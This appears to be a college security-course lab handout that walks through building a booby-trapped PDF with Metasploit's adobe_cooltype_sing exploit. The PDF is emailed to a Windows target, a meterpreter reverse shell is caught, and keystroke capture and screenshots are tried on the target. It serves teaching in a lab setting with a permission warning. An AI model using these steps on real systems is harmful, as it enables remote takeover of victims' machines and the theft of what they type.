
Project X1: Using a PDF Exploit with Metasploit

15 Points

What You Will Need

- A computer running BackTrack 4 as the attacker. This could be a real or virtual machine.
  o You can get BackTrack here: http://www.backtrack-linux.org/downloads
  o The BackTrack ISO file is also available in the S214 lab, on the VMs partition
- A computer running Windows to be the target. It can be a real or virtual machine. I used a Win 7 machine, but this exploit has been reported to work on XP and Vista also.
- The target machine must be using Adobe Reader 9.3.4 or earlier (to get old versions of Adobe, go to http://www.oldapps.com/adobe_reader.php)
- The two computers must be able to connect to one another over a network.

Warning: Be careful! Don't attack anyone without permission!

Connecting BackTrack to the Internet

1. BackTrack 4 doesn't start networking by default. In a Terminal window, type this command and then press the Enter key:

    /etc/init.d/networking start

   This starts wired networking. If you need wireless networking, you must also issue this command:

    /etc/init.d/NetworkManager start

2. To make sure you are connected to the Internet, type this command and then press the Enter key:

    ping google.com

   When you see replies, press Ctrl+C to stop the pings.

Find Your IP Address

3. Type this command and then press the Enter key, as shown below on this page:

    ifconfig

4. Find the IPv4 address that connects to the Internet. Write it in the box to the right on this page.

IP: _________________________

CNIT 121 - Bowne


Update Metasploit

5. On the BackTrack 4 machine, at a command prompt, type this command and then press the Enter key:

    msfconsole

   Metasploit launches, as shown to the right on this page.

6. Type this command and then press the Enter key:

    msfupdate

7. Wait for the update to complete. Then exit from msfconsole and re-start it.

Creating the Evil PDF File

8. On the BackTrack 4 machine, at a command prompt, type these commands, pressing the Enter key after each one, as shown below on this page. In the third command, put your IP address in instead of 192.168.1.1:

    use exploit/windows/fileformat/adobe_cooltype_sing
    set OUTPUTPATH /root
    set FILENAME evil.pdf
    set LHOST 192.168.1.1
    set PAYLOAD windows/meterpreter/reverse_tcp
    exploit

Delivering the Malicious PDF

9. On the BackTrack 4 machine, click the Firefox icon. Email the PDF to your victim machine.


Listen for the Target's Connection

10. On the BackTrack 4 machine, at a command prompt, type these commands, pressing the Enter key after each one, as shown below on this page. In the second command, put your IP address in instead of 192.168.1.1:

    use exploit/multi/handler
    set LHOST 192.168.1.1
    set PAYLOAD windows/meterpreter/reverse_tcp
    set ExitOnSession false
    exploit -j

Executing the Malicious PDF

11. On the target computer, open the PDF file in Adobe Reader.

12. On the BackTrack 4 machine, you should see a "Meterpreter session 1 opened" message, as shown above on this page.

13. Enter this command, and then press the Enter key:

    sessions -i

    You now own the target!

14. Here are some fun meterpreter commands to try:

    shell           Gives you a Windows Command Prompt on the target
    screenshot      Gives you an image of the target's desktop
    keyscan_start   Begins capturing keys typed in the target
    keyscan_dump    Shows the keystrokes captured so far

Saving the Screen Image

15. Make sure the "Meterpreter session 1 opened" message is visible.

16. On the BackTrack 4 machine, click Start, KSnapshot. Use a "Capture mode" of "Full Screen". Click the "New Snapshot" button.

17. In the Screenshot window, click the "Save As..." button.

18. Save the screenshot in the /root folder, which is your desktop. Name it Yourname-ProjX1.jpg

Turning in Your Project

19. Email the JPEG image to me as an attachment. Send the message to cnit.121@gmail.com with a subject line of Proj X1 From Your Name. Send a Cc to yourself.

Last modified 10-14-10
